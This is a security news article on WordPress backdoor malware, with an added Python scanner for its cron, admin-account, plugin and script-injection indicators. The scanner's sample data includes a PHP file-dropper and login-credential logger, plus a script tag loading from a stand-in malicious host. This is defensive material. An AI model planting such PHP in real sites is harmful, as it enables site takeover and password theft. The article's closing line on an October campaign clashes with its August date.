WordPress Websites Exploited to Distribute the ClearFake Trojan and Infostealers
Published on August 23, 2024
A recent surge in WordPress website infections has brought to light a sophisticated PHP reinfector and backdoor malware. While initially suspected to be linked to the WPCode plugin, further investigation revealed a wider scope of infection.
Sucuri recently reported on the malware's tactics and techniques; it proved hard to remove because it touches multiple files and database records rather than a single injected file.
The attackers use WordPress's cron system (WP-Cron, whose schedule lives in the wp_options table) to run malicious code on a regular schedule, and the backdoor can write arbitrary PHP files whose contents are supplied in a request parameter.
The malware persists in both plugin files and core WordPress database tables (wp_posts and wp_options). It injects malicious code into installed plugins, including popular ones like Imagify, which gives the attackers a backdoor for executing arbitrary PHP code.
The malware redirects users to malicious domains by injecting scripts into various parts of the website. It also captures and stores login credentials submitted through the WordPress admin login form and spreads itself across multiple plugins and database tables, making it difficult to remove.
The malicious admin user created by the malware has a random hexadecimal name and email, making it harder to detect.
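The behaviours described above (an attacker-scheduled WP-Cron hook stored in the serialized `cron` option, a plugin file that writes request data to disk and reads the wp-login.php credential fields, a hex-named administrator account, and a foreign script injected into content) can be checked for with a small scanner. The following is an added example and not Sucuri's tooling or the malware's code: the allowlist of core cron hooks is partial and the cron string, users, plugin source and post HTML are all constructed sample data; the hook name `sync_cache_hourly`, the host `bad-cdn.invalid` and the user `9f2c4b7e1a3d` are made up.

```python
"""Added example: heuristic checks for the persistence and credential-theft behaviours
described in the article. All sample data below is constructed, not from a real site."""
import re

# Assumption: a short allowlist of WordPress core cron hooks; extend it with the hooks
# your legitimate plugins register before trusting the result.
KNOWN_CRON_HOOKS = {
    "wp_version_check", "wp_update_plugins", "wp_update_themes", "wp_scheduled_delete",
    "delete_expired_transients", "wp_privacy_delete_old_export_files",
    "recovery_mode_clean_expired_keys", "wp_site_health_scheduled_check",
    "wp_scheduled_auto_draft_delete",
}


def php_unserialize(data: bytes):
    """Minimal parser for PHP serialize() output (i, b, d, s, N and a types),
    enough to read the `cron` row of wp_options."""
    pos = 0

    def parse():
        nonlocal pos
        t = chr(data[pos])
        if t == "N":                               # N;
            pos += 2
            return None
        if t in "ibd":                             # i:123;  b:1;  d:1.5;
            end = data.index(b";", pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return {"i": int, "b": lambda v: v == b"1", "d": float}[t](raw)
        if t == "s":                               # s:LEN:"...";
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2                      # skip :"
            pos = start + length + 2               # skip closing " and ;
            return data[start:start + length].decode()
        if t == "a":                               # a:COUNT:{key;value;...}
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2                        # skip :{
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            pos += 1                               # skip }
            return out
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    return parse()


def unknown_cron_hooks(cron_option: bytes):
    """Hook names scheduled in wp_options.cron that are not on the allowlist."""
    cron = php_unserialize(cron_option)
    found = set()
    for ts, hooks in cron.items():
        if ts == "version":                        # trailing version marker, not a timestamp
            continue
        found.update(hooks.keys())
    return sorted(found - KNOWN_CRON_HOOKS)


HEX_NAME = re.compile(r"^[0-9a-f]{8,}$")


def suspicious_admins(users):
    """Administrator accounts whose login and e-mail local part are bare hex strings."""
    return [u["user_login"] for u in users
            if "administrator" in u["roles"]
            and HEX_NAME.match(u["user_login"])
            and HEX_NAME.match(u["user_email"].split("@")[0])]


# A write call whose argument list contains request data (file dropper), and reads of
# the wp-login.php form fields `log` / `pwd` (credential capture) in plugin source.
WRITE_FROM_REQUEST = re.compile(
    r"\b(file_put_contents|fwrite|fputs)\s*\([^;]*\$_(REQUEST|POST|GET|COOKIE)\b")
LOGIN_FIELDS = re.compile(r"\$_POST\s*\[\s*['\"](log|pwd)['\"]\s*\]")


def php_indicators(src: str):
    hits = []
    if WRITE_FROM_REQUEST.search(src):
        hits.append("writes request data to disk")
    if {m.group(1) for m in LOGIN_FIELDS.finditer(src)} == {"log", "pwd"}:
        hits.append("reads wp-login.php credentials")
    return hits


EXT_SCRIPT = re.compile(r"<script[^>]*\bsrc=[\"'](https?:)?//([^/\"']+)", re.I)


def foreign_scripts(content: str, site_host: str):
    """Hosts of external <script src> tags in post/option content, excluding the site."""
    return sorted({m.group(2).lower() for m in EXT_SCRIPT.finditer(content)
                   if m.group(2).lower() != site_host.lower()})


# ---- constructed sample data ------------------------------------------------------
SAMPLE_CRON = (b'a:3:{i:1724400000;a:1:{s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";'
               b'a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}'
               b'i:1724400600;a:1:{s:17:"sync_cache_hourly";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";'
               b'a:3:{s:8:"schedule";s:6:"hourly";s:4:"args";a:0:{}s:8:"interval";i:3600;}}}'
               b's:7:"version";i:2;}')
SAMPLE_USERS = [
    {"user_login": "alice", "user_email": "alice@example.com", "roles": ["administrator"]},
    {"user_login": "bob", "user_email": "bob@example.com", "roles": ["editor"]},
    {"user_login": "9f2c4b7e1a3d", "user_email": "9f2c4b7e1a3d@example.com", "roles": ["administrator"]},
]
SAMPLE_PLUGIN = r"""<?php
// constructed sample of code injected into a plugin file (hypothetical)
if (isset($_REQUEST['c'])) { file_put_contents(__DIR__ . '/' . $_REQUEST['f'], $_REQUEST['c']); }
add_action('wp_login', function () {
    if (!empty($_POST['log']) && !empty($_POST['pwd'])) {
        file_put_contents(__DIR__ . '/.log', $_POST['log'] . ':' . $_POST['pwd'] . "\n", FILE_APPEND);
    }
});
"""
SAMPLE_POST = ('<p>Hello</p><script src="https://bad-cdn.invalid/js/clr.js"></script>'
               '<script src="https://example.com/wp-includes/js/jquery.js"></script>')


def scan(cron_option, users, plugin_src, post_html, site_host):
    return {
        "unknown_cron_hooks": unknown_cron_hooks(cron_option),
        "suspicious_admins": suspicious_admins(users),
        "plugin_indicators": php_indicators(plugin_src),
        "foreign_scripts": foreign_scripts(post_html, site_host),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_CRON, SAMPLE_USERS, SAMPLE_PLUGIN, SAMPLE_POST, "example.com").items():
        print(f"{key}: {value}")
```

On a real site, feed `unknown_cron_hooks` the value of `SELECT option_value FROM wp_options WHERE option_name = 'cron'`, walk `wp-content/plugins` for `php_indicators`, and run `foreign_scripts` over `post_content` and over any `wp_options` rows that hold HTML. The hex-name rule and the cron allowlist are heuristics: review the hits rather than deleting on match, and remember that a reinfector will restore anything you remove unless every copy (cron entry, plugin file, database rows, admin user) goes in the same cleanup.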
Successful infections can lead to complete website compromise, allowing attackers to manipulate content, steal sensitive data, and launch further attacks.
Malicious activities, such as spamming and hacking attempts, can damage a website's reputation and lead to search engine blacklisting. In some cases, attackers may hold websites hostage, demanding ransom payments to restore access.
In October, more than 6,000 WordPress websites were compromised by malicious plugin campaigns that push infostealers.